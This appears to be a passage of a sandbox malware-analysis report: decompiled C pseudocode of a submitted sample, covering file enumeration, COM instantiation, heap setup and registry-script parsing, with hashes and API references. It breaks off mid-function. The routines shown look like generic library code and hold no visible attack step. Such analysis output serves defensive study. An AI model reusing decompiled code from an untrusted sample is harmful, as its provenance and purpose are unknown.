    				union _FINDEX_INFO_LEVELS _v648;
    				union _FINDEX_INFO_LEVELS _v652;
    				union _FINDEX_INFO_LEVELS _v656;
    				union _FINDEX_INFO_LEVELS _v660;
    				signed int _v664;
    				union _FINDEX_INFO_LEVELS _v668;
    				union _FINDEX_INFO_LEVELS _v672;
    				void* __ebx;
    				void* __edi;
    				intOrPtr _t68;
    				signed int _t73;
    				signed int _t75;
    				char _t77;
    				signed char _t78;
    				signed int _t84;
    				signed int _t94;
    				signed int _t97;
    				union _FINDEX_INFO_LEVELS _t98;
    				union _FINDEX_INFO_LEVELS _t100;
    				intOrPtr* _t106;
    				signed int _t109;
    				intOrPtr _t116;
    				signed int _t118;
    				signed int _t121;
    				signed int _t123;
    				void* _t126;
    				union _FINDEX_INFO_LEVELS _t127;
    				void* _t128;
    				intOrPtr* _t130;
    				intOrPtr* _t133;
    				signed int _t135;
    				intOrPtr* _t138;
    				signed int _t143;
    				signed int _t149;
    				void* _t155;
    				signed int _t158;
    				intOrPtr _t160;
    				void* _t161;
    				void* _t165;
    				void* _t166;
    				signed int _t167;
    				signed int _t170;
    				void* _t171;
    				signed int _t172;
    				void* _t173;
    				void* _t174;
    
    				_push(__ecx);
    				_t133 = _a4;
    				_t2 = _t133 + 1; // 0x1
    				_t155 = _t2;
    				do {
    					_t68 =  *_t133;
    					_t133 = _t133 + 1;
    				} while (_t68 != 0);
    				_t158 = _a12;
    				_t135 = _t133 - _t155 + 1;
    				_v8 = _t135;
    				if(_t135 <=  !_t158) {
    					_push(__esi);
    					_t5 = _t158 + 1; // 0x1
    					_t126 = _t5 + _t135;
    					_t165 = E00EA9E27(_t126, 1);
    					__eflags = _t158;
    					if(_t158 == 0) {
    						L7:
    						_push(_v8);
    						_t126 = _t126 - _t158;
    						_t73 = E00EACB84(_t165 + _t158, _t126, _a4);
    						_t172 = _t171 + 0x10;
    						__eflags = _t73;
    						if(_t73 != 0) {
    							goto L12;
    						} else {
    							_t130 = _a16;
    							_t118 = E00EAA626(_t130);
    							_v8 = _t118;
    							__eflags = _t118;
    							if(_t118 == 0) {
    								 *( *(_t130 + 4)) = _t165;
    								_t167 = 0;
    								_t14 = _t130 + 4;
    								 *_t14 =  *(_t130 + 4) + 4;
    								__eflags =  *_t14;
    							} else {
    								E00EA8B82(_t165);
    								_t167 = _v8;
    							}
    							E00EA8B82(0);
    							_t121 = _t167;
    							goto L4;
    						}
    					} else {
    						_push(_t158);
    						_t123 = E00EACB84(_t165, _t126, _a8);
    						_t172 = _t171 + 0x10;
    						__eflags = _t123;
    						if(_t123 != 0) {
    							L12:
    							_push(0);
    							_push(0);
    							_push(0);
    							_push(0);
    							_push(0);
    							E00EA749C();
    							asm("int3");
    							_t170 = _t172;
    							_t173 = _t172 - 0x298;
    							_t75 =  *0xeb9008; // 0x64e1d101
    							_v48 = _t75 ^ _t170;
    							_t138 = _v32;
    							_t156 = _v28;
    							_push(_t126);
    							_push(0);
    							_t160 = _v36;
    							_v648 = _t156;
    							__eflags = _t138 - _t160;
    							if(_t138 != _t160) {
    								while(1) {
    									_t116 =  *_t138;
    									__eflags = _t116 - 0x2f;
    									if(_t116 == 0x2f) {
    										break;
    									}
    									__eflags = _t116 - 0x5c;
    									if(_t116 != 0x5c) {
    										__eflags = _t116 - 0x3a;
    										if(_t116 != 0x3a) {
    											_t138 = E00EAD0C0(_t160, _t138);
    											__eflags = _t138 - _t160;
    											if(_t138 != _t160) {
    												continue;
    											}
    										}
    									}
    									break;
    								}
    								_t156 = _v612;
    							}
    							_t77 =  *_t138;
    							_v605 = _t77;
    							__eflags = _t77 - 0x3a;
    							if(_t77 != 0x3a) {
    								L23:
    								_t127 = 0;
    								__eflags = _t77 - 0x2f;
    								if(__eflags == 0) {
    									L26:
    									_t78 = 1;
    								} else {
    									__eflags = _t77 - 0x5c;
    									if(__eflags == 0) {
    										goto L26;
    									} else {
    										__eflags = _t77 - 0x3a;
    										_t78 = 0;
    										if(__eflags == 0) {
    											goto L26;
    										}
    									}
    								}
    								_v672 = _t127;
    								_v668 = _t127;
    								_push(_t165);
    								asm("sbb eax, eax");
    								_v664 = _t127;
    								_v660 = _t127;
    								_v640 =  ~(_t78 & 0x000000ff) & _t138 - _t160 + 0x00000001;
    								_v656 = _t127;
    								_v652 = _t127;
    								_t84 = E00EAA01F(_t138 - _t160 + 1, _t160,  &_v672, E00EAA533(_t156, __eflags));
    								_t174 = _t173 + 0xc;
    								asm("sbb eax, eax");
    								_t166 = FindFirstFileExW( !( ~_t84) & _v664, _t127,  &_v604, _t127, _t127, _t127);
    								__eflags = _t166 - 0xffffffff;
    								if(_t166 != 0xffffffff) {
    									_t143 =  *((intOrPtr*)(_v612 + 4)) -  *_v612;
    									__eflags = _t143;
    									_t144 = _t143 >> 2;
    									_v644 = _t143 >> 2;
    									do {
    										_v636 = _t127;
    										_v632 = _t127;
    										_v628 = _t127;
    										_v624 = _t127;
    										_v620 = _t127;
    										_v616 = _t127;
    										_t94 = E00EA9F50( &(_v604.cFileName),  &_v636,  &_v605, E00EAA533(_t156, __eflags));
    										_t174 = _t174 + 0x10;
    										asm("sbb eax, eax");
    										_t97 =  !( ~_t94) & _v628;
    										__eflags =  *_t97 - 0x2e;
    										if( *_t97 != 0x2e) {
    											L34:
    											_push(_v612);
    											_t98 = E00EAA22B(_t144, _t166, _t97, _t160, _v640);
    											_t174 = _t174 + 0x10;
    											_v648 = _t98;
    											__eflags = _t98;
    											if(_t98 != 0) {
    												__eflags = _v616 - _t127;
    												if(_v616 != _t127) {
    													E00EA8B82(_v628);
    													_t98 = _v648;
    												}
    												_t127 = _t98;
    											} else {
    												goto L35;
    											}
    										} else {
    											_t144 =  *((intOrPtr*)(_t97 + 1));
    											__eflags = _t144;
    											if(_t144 == 0) {
    												goto L35;
    											} else {
    												__eflags = _t144 - 0x2e;
    												if(_t144 != 0x2e) {
    													goto L34;
    												} else {
    													__eflags =  *((intOrPtr*)(_t97 + 2)) - _t127;
    													if( *((intOrPtr*)(_t97 + 2)) == _t127) {
    														goto L35;
    													} else {
    														goto L34;
    													}
    												}
    											}
    										}
    										L43:
    										FindClose(_t166);
    										goto L44;
    										L35:
    										__eflags = _v616 - _t127;
    										if(_v616 != _t127) {
    											E00EA8B82(_v628);
    											_pop(_t144);
    										}
    										__eflags = FindNextFileW(_t166,  &_v604);
    									} while (__eflags != 0);
    									_t106 = _v612;
    									_t149 = _v644;
    									_t156 =  *_t106;
    									_t109 =  *((intOrPtr*)(_t106 + 4)) -  *_t106 >> 2;
    									__eflags = _t149 - _t109;
    									if(_t149 != _t109) {
    										E00EACB90(_t156, _t156 + _t149 * 4, _t109 - _t149, 4, E00EA9E84);
    									}
    									goto L43;
    								} else {
    									_push(_v612);
    									_t127 = E00EAA22B( &_v604, _t166, _t160, _t127, _t127);
    								}
    								L44:
    								__eflags = _v652;
    								_pop(_t165);
    								if(_v652 != 0) {
    									E00EA8B82(_v664);
    								}
    								_t100 = _t127;
    							} else {
    								__eflags = _t138 - _t160 + 1;
    								if(_t138 == _t160 + 1) {
    									_t77 = _v605;
    									goto L23;
    								} else {
    									_push(_t156);
    									_t100 = E00EAA22B(_t138, _t165, _t160, 0, 0);
    								}
    							}
    							_pop(_t161);
    							__eflags = _v12 ^ _t170;
    							_pop(_t128);
    							return E00EA403C(_t100, _t128, _v12 ^ _t170, _t156, _t161, _t165);
    						} else {
    							goto L7;
    						}
    					}
    				} else {
    					_t121 = 0xc;
    					L4:
    					return _t121;
    				}
    			}



































































    Memory Dump Source
    • Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
    • Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 8ecb4f265c08ea5114af782c8699acb492d2d9329690a97b514e103d075b526c
    • Instruction ID: fb0d7ce8197b584ec33ee551b8997117adda4e764e4fbbb7bb0990dbe1c6eb78
    • Opcode Fuzzy Hash: 8ecb4f265c08ea5114af782c8699acb492d2d9329690a97b514e103d075b526c
    • Instruction Fuzzy Hash: E141A5758042189EDF10DF69CC89AEEB7B9AF4A304F1852E9E41DA7211D7316E84CF20
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 37%
    			E00EA14A2(void* __ecx, intOrPtr* _a4) {
    				void* _t4;
    				intOrPtr* _t8;
    				intOrPtr* _t11;
    				intOrPtr* _t14;
    				void* _t17;
    
    				_t8 = _a4;
    				if(_t8 != 0) {
    					_t17 = 0;
    					_t14 = __ecx + 0x28;
    					if( *_t14 != 0) {
    						L4:
    						 *_t8 =  *_t14;
    						_t11 =  *_t14;
    						 *((intOrPtr*)( *_t11 + 4))(_t11);
    						L5:
    						return _t17;
    					}
    					__imp__CoCreateInstance(0xeb12d0, 0, 1, 0xeb6250, _t14);
    					_t17 = _t4;
    					if(_t17 < 0) {
    						goto L5;
    					}
    					goto L4;
    				}
    				return 0x80004003;
    			}

    APIs
    • CoCreateInstance.OLE32(00EB12D0,00000000,00000001,00EB6250,?), ref: 00EA14CD
    Similarity
    • API ID: CreateInstance
    • String ID:
    • API String ID: 542301482-0
    • Opcode ID: 8ad7df9bf591dd02174de7e05c55aa3de941ab34de8749d4a6eca525b43dd3ce
    • Instruction ID: 8888d980e747a40595da6f123e2fe4e8c86c5f270237c7ab01eacfe8541525cc
    • Opcode Fuzzy Hash: 8ad7df9bf591dd02174de7e05c55aa3de941ab34de8749d4a6eca525b43dd3ce
    • Instruction Fuzzy Hash: 2DF089762043219B87248E4ADC84D87FB6DEF5EB64B104155F905FF250D770AC40C6D4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00EAB2B8() {
    				signed int _t3;
    
    				_t3 = GetProcessHeap();
    				 *0xfe2dc0 = _t3;
    				return _t3 & 0xffffff00 | _t3 != 0x00000000;
    			}

    APIs
    Similarity
    • API ID: HeapProcess
    • String ID:
    • API String ID: 54951025-0
    • Opcode ID: e944909fbf7ad781eda1e4e1f26996a644bf1464f31e68f928f10da238db76f7
    • Instruction ID: 16b6815d466e0ec8fec3a7e3e8f22409cce16e4dcb55477d9af78590f429fd0c
    • Opcode Fuzzy Hash: e944909fbf7ad781eda1e4e1f26996a644bf1464f31e68f928f10da238db76f7
    • Instruction Fuzzy Hash: E8A012302011458F47504F357F05209369CB60019130001949004C4030E72040006601
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00EA9DF6(void* __ecx) {
    				char _v8;
    				intOrPtr _t7;
    				char _t13;
    
    				_t13 = 0;
    				_v8 = 0;
    				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
    				_t16 =  *((intOrPtr*)(_t7 + 8));
    				if( *((intOrPtr*)(_t7 + 8)) < 0) {
    					L2:
    					_t13 = 1;
    				} else {
    					E00EA9841(_t16,  &_v8);
    					if(_v8 != 1) {
    						goto L2;
    					}
    				}
    				return _t13;
    			}

    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: ed9c1925cec1054f47211cdcd88e88786feddc4eef384b275f41e22a3a111c21
    • Instruction ID: fce567c26f393ead80db1f1fcb9d12603466fdfce443522bfa3ae92e18f851be
    • Opcode Fuzzy Hash: ed9c1925cec1054f47211cdcd88e88786feddc4eef384b275f41e22a3a111c21
    • Instruction Fuzzy Hash: 34E0EC72915238EBCB19DB98C944D9AF3ECEB4AB54F155496F501E7212D274EE00C7D0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 81%
    			E00EA29E8(CHAR* __ebx, CHAR** __ecx, void* __edi, void* __esi, void* __eflags) {
    				CHAR** _t42;
    				void* _t45;
    				CHAR* _t47;
    				CHAR* _t48;
    				CHAR* _t53;
    				CHAR* _t61;
    				CHAR* _t62;
    				CHAR* _t63;
    				CHAR* _t64;
    				char _t66;
    				CHAR* _t67;
    				CHAR* _t68;
    				CHAR* _t69;
    				CHAR* _t73;
    				CHAR* _t74;
    				CHAR* _t75;
    				CHAR* _t76;
    				CHAR* _t77;
    				CHAR* _t78;
    				CHAR* _t79;
    				CHAR* _t84;
    				void* _t89;
    				CHAR* _t92;
    				char _t98;
    				CHAR** _t101;
    				CHAR* _t103;
    				void* _t104;
    				void* _t105;
    
    				_t80 = __ebx;
    				_push(0x40);
    				E00EB0216(0xeb08c4, __ebx, __edi, __esi);
    				_t101 = __ecx;
    				_t103 =  *(_t104 + 8);
    				_t42 =  *(_t104 + 0xc);
    				 *(_t104 - 0x4c) = _t42;
    				if(_t103 != 0 && _t42 != 0) {
    					_t80 = 0;
    					 *_t42 = 0;
    					_t45 = E00EA74D0(_t103);
    					 *((intOrPtr*)(_t104 - 0x44)) = 0;
    					_t47 =  <  ? 0x3e8 : _t45 + _t45;
    					 *(_t104 - 0x40) = _t47;
    					__imp__CoTaskMemAlloc(_t47);
    					 *(_t104 - 0x3c) = _t47;
    					if(_t47 != 0) {
    						 *_t47 = 0;
    					}
    					 *(_t104 - 4) = _t80;
    					if(_t47 != 0) {
    						 *_t101 = _t103;
    						_t48 = _t80;
    						_t84 = _t80;
    						_t98 =  *0xfe2df8; // 0x0
    						 *((char*)(_t104 - 0x33)) = _t98;
    						 *(_t104 - 0x38) = _t48;
    						 *(_t104 - 0x32) = _t80;
    						 *(_t104 - 0x31) = _t84;
    						__eflags =  *_t103 - _t48;
    						if( *_t103 == _t48) {
    							L45:
    							 *(_t104 - 0x3c) = _t80;
    							 *( *(_t104 - 0x4c)) =  *(_t104 - 0x3c);
    						} else {
    							while(1) {
    								 *(_t104 - 0x48) = _t48;
    								__eflags = _t98 - 1;
    								if(_t98 != 1) {
    									goto L29;
    								}
    								__eflags = _t48;
    								if(_t48 != 0) {
    									L14:
    									_t64 =  *_t101;
    									__eflags =  *_t64 - 0x27;
    									if( *_t64 != 0x27) {
    										__eflags = _t84;
    										if(_t84 != 0) {
    											goto L29;
    										} else {
    											goto L22;
    										}
    									} else {
    										__eflags = _t84;
    										if(_t84 != 0) {
    											_t69 = CharNextA(_t64);
    											__eflags =  *_t69 - 0x27;
    											if( *_t69 == 0x27) {
    												_t103 = CharNextA( *_t101);
    												 *_t101 = _t103;
    												_t73 = E00EA18A6(_t104 - 0x44, _t103, CharNextA(_t103) - _t103);
    												__eflags = _t73;
    												if(_t73 == 0) {
    													goto L5;
    												} else {
    													goto L29;
    												}
    											} else {
    												 *(_t104 - 0x31) = _t80;
    												L22:
    												_t66 =  *( *_t101);
    												__eflags = _t66 - 0x7b;
    												if(_t66 != 0x7b) {
    													_t92 =  *(_t104 - 0x48);
    													 *(_t104 - 0x38) = _t92;
    													__eflags = _t66 - 0x7d;
    													if(_t66 != 0x7d) {
    														goto L29;
    													} else {
    														_t67 = _t92 - 1;
    														 *(_t104 - 0x38) = _t67;
    														__eflags = _t67;
    														if(_t67 != 0) {
    															goto L29;
    														} else {
    															__eflags =  *(_t104 - 0x32) - 1;
    															if(__eflags != 0) {
    																goto L29;
    															} else {
    																_push(L"\r\n\t}\r\n}\r\n");
    																_t68 = E00EA1928(_t80, _t104 - 0x44, _t101, _t103, __eflags);
    																__eflags = _t68;
    																if(_t68 == 0) {
    																	goto L5;
    																} else {
    																	 *(_t104 - 0x32) = _t80;
    																	goto L29;
    																}
    															}
    														}
    													}
    												} else {
    													 *(_t104 - 0x38) =  &(( *(_t104 - 0x38))[1]);
    													goto L29;
    												}
    											}
    										} else {
    											 *(_t104 - 0x31) = 1;
    											goto L29;
    										}
    									}
    								} else {
    									_t74 = E00EA772C(_t103, "HKCR");
    									__eflags = _t74;
    									if(_t74 == 0) {
    										L13:
    										_t84 =  *(_t104 - 0x31);
    										goto L14;
    									} else {
    										__eflags = _t74 -  *_t101;
    										if(__eflags != 0) {
    											goto L13;
    										} else {
    											_t75 = CharNextA( *_t101);
    											 *_t101 = _t75;
    											_t76 = CharNextA(_t75);
    											 *_t101 = _t76;
    											_t77 = CharNextA(_t76);
    											 *_t101 = _t77;
    											_t78 = CharNextA(_t77);
    											_push(L"HKCU\r\n{\tSoftware\r\n\t{\r\n\t\tClasses");
    											 *_t101 = _t78;
    											_t79 = E00EA1928(_t80, _t104 - 0x44, _t101, _t103, __eflags);
    											__eflags = _t79;
    											if(_t79 == 0) {
    												goto L5;
    											} else {
    												 *(_t104 - 0x32) = 1;
    												goto L13;
    											}
    										}
    									}
    								}
    								goto L46;
    								L29:
    								_t103 =  *_t101;
    								_push(_t103);
    								__eflags =  *_t103 - 0x25;
    								if( *_t103 != 0x25) {
    									L32:
    									_t53 = E00EA18A6(_t104 - 0x44, _t103, CharNextA() - _t103);
    									__eflags = _t53;
    									if(_t53 == 0) {
    										goto L5;
    									} else {
    										goto L33;
    									}
    								} else {
    									_t103 = CharNextA();
    									 *_t101 = _t103;
    									__eflags =  *_t103 - 0x25;
    									if( *_t103 != 0x25) {
    										_t103 = E00EA22D6(_t103, 0x25);
    										__eflags = _t103;
    										if(_t103 == 0) {
    											L44:
    											_t80 = 0x80020009;
    										} else {
    											_t89 = _t103 -  *_t101;
    											__eflags = _t89 - 0x1f;
    											if(_t89 > 0x1f) {
    												_t80 = 0x80004005;
    											} else {
    												E00EA1285(E00EA770F(_t104 - 0x30, 0x20,  *_t101, _t89));
    												_t105 = _t105 + 0x14;
    												_t61 = E00EA2199(_t101[1], _t104 - 0x30);
    												__eflags = _t61;
    												if(__eflags == 0) {
    													goto L44;
    												} else {
    													_push(_t61);
    													_t62 = E00EA1928(_t80, _t104 - 0x44, _t101, _t103, __eflags);
    													__eflags = _t62;
    													if(_t62 == 0) {
    														goto L5;
    													} else {
    														_t63 =  *_t101;
    														while(1) {
    															__eflags = _t63 - _t103;
    															if(_t63 == _t103) {
    																break;
    															}
    															_t63 = CharNextA(_t63);
    															 *_t101 = _t63;
    														}
    														L33:
    														_t103 = CharNextA( *_t101);
    														 *_t101 = _t103;
    														__eflags =  *_t103;
    														if( *_t103 == 0) {
    															goto L45;
    														} else {
    															_t48 =  *(_t104 - 0x38);
    															_t84 =  *(_t104 - 0x31);
    															_t98 =  *((intOrPtr*)(_t104 - 0x33));
    															continue;
    														}
    													}
    												}
    											}
    										}
    									} else {
    										_push(_t103);
    										goto L32;
    									}
    								}
    								goto L46;
    							}
    						}
    					} else {
    						L5:
    						_t80 = 0x8007000e;
    					}
    					L46:
    					__imp__CoTaskMemFree( *(_t104 - 0x3c));
    				}
    				return E00EB01C5(_t80, _t101, _t103);
    			}

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00EA29EF
    • _strlen.LIBCMT ref: 00EA2A14
    • CoTaskMemAlloc.OLE32(00000000,00000040,00EA2C84,?,00000000,00000000,?), ref: 00EA2A2E
    • CharNextA.USER32(?,?,?,00000000), ref: 00EA2A95
    • CharNextA.USER32(00000000,?,?,?,00000000), ref: 00EA2A9E
    • CharNextA.USER32(00000000,?,?,?,00000000), ref: 00EA2AA7
    • CharNextA.USER32(00000000,?,?,?,00000000), ref: 00EA2AB0
    • CharNextA.USER32(?,?,?,00000000), ref: 00EA2AE6
    • CharNextA.USER32(?,?,?,00000000), ref: 00EA2AF8
    • CharNextA.USER32(00000000,?,?,?,00000000), ref: 00EA2B03
    • CharNextA.USER32(00000000,}},?,?,00000000), ref: 00EA2B6A
    • CharNextA.USER32(?), ref: 00EA2B7A
    • CharNextA.USER32(?,?,00000000), ref: 00EA2B96
    • __cftof.LIBCMT ref: 00EA2BD8
    • CharNextA.USER32(00000000,00000000,?,?,?,00EA1D41,?,?), ref: 00EA2C0C
    • CoTaskMemFree.OLE32(?), ref: 00EA2C39
    Strings
    Similarity
    • API ID: CharNext$Task$AllocFreeH_prolog3___cftof_strlen
    • String ID: }}$HKCR$HKCU{Software{Classes
    • API String ID: 4131663743-1142484189
    • Opcode ID: 8b1e3869e73bdedc4c5dda15038682b0636333f5293e930e210d924b2d899509
    • Instruction ID: a5dcc7e95669a6976ed58dc78b3f4c0d13ba8eb0ab2bb1a217d224f7560e1938
    • Opcode Fuzzy Hash: 8b1e3869e73bdedc4c5dda15038682b0636333f5293e930e210d924b2d899509
    • Instruction Fuzzy Hash: 9071B170D043469FDB259FA8D8946AEBBB4AF1E314F24215DEA41FB261EB34AC45CB10
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 88%
    			E00EA2DA0(intOrPtr __ecx, void* __edx, char* _a4, void* _a8, void* _a12, void* _a16) {
    				char _v8;
    				char _v16;
    				signed int _v20;
    				char _v280;
    				char _v4376;
    				intOrPtr _v4380;
    				int _v4384;
    				void* _v4388;
    				signed int _v4392;
    				int _v4396;
    				signed int _v4400;
    				int _v4404;
    				void* _v4408;
    				signed int _v4412;
    				void* _v4416;
    				void* _v4420;
    				signed int _v4424;
    				signed int _v4428;
    				signed int _v4432;
    				signed int _v4436;
    				signed int _v4440;
    				void* _v4444;
    				char _v4448;
    				signed int _v4452;
    				signed int _v4456;
    				signed int _v4460;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				signed int _t131;
    				signed int _t132;
    				void* _t140;
    				void* _t143;
    				void* _t144;
    				void* _t145;
    				void* _t146;
    				void* _t152;
    				void* _t157;
    				void* _t159;
    				void* _t162;
    				void* _t165;
    				void* _t167;
    				void* _t169;
    				void* _t171;
    				void* _t172;
    				void* _t179;
    				void* _t180;
    				void* _t190;
    				void* _t197;
    				void* _t198;
    				void* _t199;
    				signed int _t225;
    				char* _t242;
    				void* _t243;
    				void* _t245;
    				void* _t246;
    				void* _t247;
    				void* _t248;
    				void* _t250;
    				signed int _t251;
    				void* _t252;
    
    				_t240 = __edx;
    				_push(0xffffffff);
    				_push(0xeb0906);
    				_push( *[fs:0x0]);
    				E00EB02C0(0x115c);
    				_t131 =  *0xeb9008; // 0x64e1d101
    				_t132 = _t131 ^ _t251;
    				_v20 = _t132;
    				_push(_t132);
    				 *[fs:0x0] =  &_v16;
    				_v4380 = __ecx;
    				_t242 = _a4;
    				_v4388 = _a8;
    				_t197 = 0;
    				_v4400 = 0;
    				_v4404 = 0;
    				_v4396 = 0;
    				_v8 = 0;
    				_t245 = E00EA2327(__ecx, _t242);
    				if(_t245 < 0) {
    					L89:
    					 *[fs:0x0] = _v16;
    					_pop(_t243);
    					_pop(_t246);
    					_pop(_t198);
    					return E00EA403C(_t245, _t198, _v20 ^ _t251, _t240, _t243, _t246);
    				} else {
    					while( *_t242 != 0x7d) {
    						_v4384 = 1;
    						lstrcmpiA(_t242, "Delete");
    						asm("sbb esi, esi");
    						_t247 = _t245 + 1;
    						_v4392 = _t247;
    						_t140 = lstrcmpiA(_t242, "ForceRemove");
    						__eflags = _t140;
    						if(_t140 == 0) {
    							L4:
    							_t245 = E00EA2327(_v4380, _t242);
    							__eflags = _t245;
    							if(_t245 < 0) {
    								L87:
    								if(_t197 != 0) {
    									RegCloseKey(_t197);
    								}
    								goto L89;
    							}
    							_t248 = 0;
    							__eflags = _a12;
    							if(_a12 == 0) {
    								L15:
    								_t143 = lstrcmpiA(_t242, "NoRemove");
    								__eflags = _t143;
    								if(_t143 != 0) {
    									L17:
    									_t144 = lstrcmpiA(_t242, "Val");
    									__eflags = _t144;
    									if(_t144 != 0) {
    										_t240 = 0x5c;
    										_t145 = E00EA22D6(_t242, 0x5c);
    										__eflags = _t145;
    										if(_t145 != 0) {
    											L86:
    											_t245 = 0x80020009;
    											goto L87;
    										}
    										__eflags = _a12 - _t145;
    										if(_a12 == _t145) {
    											__eflags = _a16;
    											if(_a16 != 0) {
    												_t146 = 2;
    											} else {
    												_t146 = E00EA1629( &_v4404, _v4388, _t242, 0x20019);
    												_t197 = _v4404;
    											}
    											_v4392 = _t146;
    											__eflags = _t146;
    											_t212 =  ==  ? _a16 : 1;
    											_v4420 =  ==  ? _a16 : 1;
    											E00EA1285(E00EA770F( &_v280, 0x104, _t242, 0xffffffff));
    											_t252 = _t252 + 0x14;
    											_t245 = E00EA2327(_v4380, _t242);
    											__eflags = _t245;
    											if(_t245 < 0) {
    												goto L87;
    											} else {
    												_t214 = _v4380;
    												_t245 = E00EA297D(_t197, _v4380, _t240, _t242);
    												__eflags = _t245;
    												if(_t245 < 0) {
    													goto L87;
    												}
    												__eflags =  *_t242 - 0x7b;
    												if( *_t242 != 0x7b) {
    													L67:
    													_t152 = _v4392;
    													__eflags = _t152 - 2;
    													if(_t152 == 2) {
    														continue;
    													}
    													__eflags = _t152;
    													if(_t152 == 0) {
    														__eflags = _a16;
    														if(_a16 == 0) {
    															L76:
    															_t225 = E00EA2948(_t214, _t197);
    															_t152 = 0;
    															_v4392 = _t225;
    															__eflags = _t197;
    															if(_t197 != 0) {
    																_t152 = RegCloseKey(_t197);
    																_t225 = _v4392;
    																_t197 = 0;
    																__eflags = 0;
    																_v4404 = 0;
    															}
    															_v4400 = _v4400 & 0x00000000;
    															__eflags = _t152;
    															if(_t152 != 0) {
    																L48:
    																_t245 = E00EA12D7(_t152);
    																goto L87;
    															} else {
    																__eflags = _v4384 - _t152;
    																if(_v4384 == _t152) {
    																	continue;
    																}
    																__eflags = _t225;
    																if(_t225 != 0) {
    																	continue;
    																}
    																_v4456 = _v4456 & _t225;
    																_v4452 = _v4452 & _t225;
    																_v4460 = _v4388;
    																_t152 = E00EA1596( &_v4460,  &_v280);
    																_v4460 = _v4460 & 0x00000000;
    																__eflags = _t152;
    																if(_t152 != 0) {
    																	goto L48;
    																}
    																continue;
    															}
    														}
    														_t157 = E00EA2948(_t214, _t197);
    														__eflags = _t157;
    														if(_t157 == 0) {
    															goto L76;
    														}
    														_t159 = E00EA2919( &_v280);
    														__eflags = _t159;
    														if(_t159 != 0) {
    															__eflags = _v4384;
    															if(__eflags != 0) {
    																E00EA1685( &_v4404, _t240, _t242, __eflags,  &_v280);
    																_t197 = _v4404;
    															}
    														}
    														continue;
    													}
    													__eflags = _a16;
    													if(_a16 == 0) {
    														goto L48;
    													}
    													continue;
    												}
    												_t162 = E00EA74D0(_t242);
    												_pop(_t214);
    												__eflags = _t162 - 1;
    												if(_t162 != 1) {
    													goto L67;
    												}
    												_t245 = E00EA2DA0(_v4380, _t240, _t242, _t197, 0, _v4420);
    												__eflags = _t245;
    												if(_t245 >= 0) {
    													L66:
    													_t214 = _v4380;
    													_t245 = E00EA2327(_v4380, _t242);
    													__eflags = _t245;
    													if(_t245 < 0) {
    														goto L87;
    													}
    													goto L67;
    												}
    												__eflags = _v4420;
    												if(_v4420 == 0) {
    													goto L87;
    												}
    												goto L66;
    											}
    										}
    										_t199 = _v4388;
    										_t165 = E00EA1629( &_v4404, _t199, _t242, 0x2001f);
    										__eflags = _t165;
    										if(_t165 == 0) {
    											L49:
    											_t197 = _v4404;
    											L50:
    											_t245 = E00EA2327(_v4380, _t242);
    											__eflags = _t245;
    											if(_t245 < 0) {
    												goto L87;
    											}
    											__eflags =  *_t242 - 0x3d;
    											if( *_t242 != 0x3d) {
    												L53:
    												__eflags =  *_t242 - 0x7b;
    												if( *_t242 != 0x7b) {
    													continue;
    												}
    												_t167 = E00EA74D0(_t242);
    												__eflags = _t167 - 1;
    												if(_t167 != 1) {
    													continue;
    												}
    												_t245 = E00EA2DA0(_v4380, _t240, _t242, _t197, _a12, 0);
    												__eflags = _t245;
    												if(_t245 < 0) {
    													goto L87;
    												}
    												_t169 = E00EA2327(_v4380, _t242);
    												L33:
    												_t245 = _t169;
    												__eflags = _t245;
    												if(_t245 < 0) {
    													goto L87;
    												}
    												continue;
    											}
    											_t171 = E00EA2440(_v4380,  &_v4404, 0, _t242);
    											_t197 = _v4404;
    											_t245 = _t171;
    											__eflags = _t245;
    											if(_t245 < 0) {
    												goto L87;
    											}
    											goto L53;
    										}
    										_t172 = E00EA1629( &_v4404, _t199, _t242, 0x20019);
    										__eflags = _t172;
    										if(_t172 == 0) {
    											goto L49;
    										}
    										_t235 = _v4396;
    										_push( &_v4448);
    										_v4384 = 0;
    										_push( &_v4384);
    										__eflags = _v4396;
    										if(_v4396 == 0) {
    											_t152 = RegCreateKeyExA(_t199, _t242, 0, 0, 0, 0x2001f, 0, ??, ??);
    										} else {
    											_t252 = _t252 - 0x14;
    											_push(_t242);
    											_push(_t199);
    											_t152 = E00EA1348(_t235);
    										}
    										__eflags = _t152;
    										if(_t152 != 0) {
    											_t197 = _v4404;
    										} else {
    											_t152 = 0;
    											__eflags = _v4404;
    											if(_v4404 != 0) {
    												_t152 = RegCloseKey(_v4404);
    											}
    											_t197 = _v4384;
    											_v4404 = _t197;
    											_v4400 = 0;
    										}
    										__eflags = _t152;
    										if(_t152 == 0) {
    											goto L50;
    										} else {
    											goto L48;
    										}
    									}
    									_t245 = E00EA2327(_v4380,  &_v4376);
    									__eflags = _t245;
    									if(_t245 < 0) {
    										goto L87;
    									}
    									_t245 = E00EA2327(_v4380, _t242);
    									__eflags = _t245;
    									if(_t245 < 0) {
    										goto L87;
    									}
    									__eflags =  *_t242 - 0x3d;
    									if( *_t242 != 0x3d) {
    										goto L86;
    									}
    									__eflags = _a12;
    									if(_a12 == 0) {
    										__eflags = _a16;
    										if(_a16 != 0) {
    											L32:
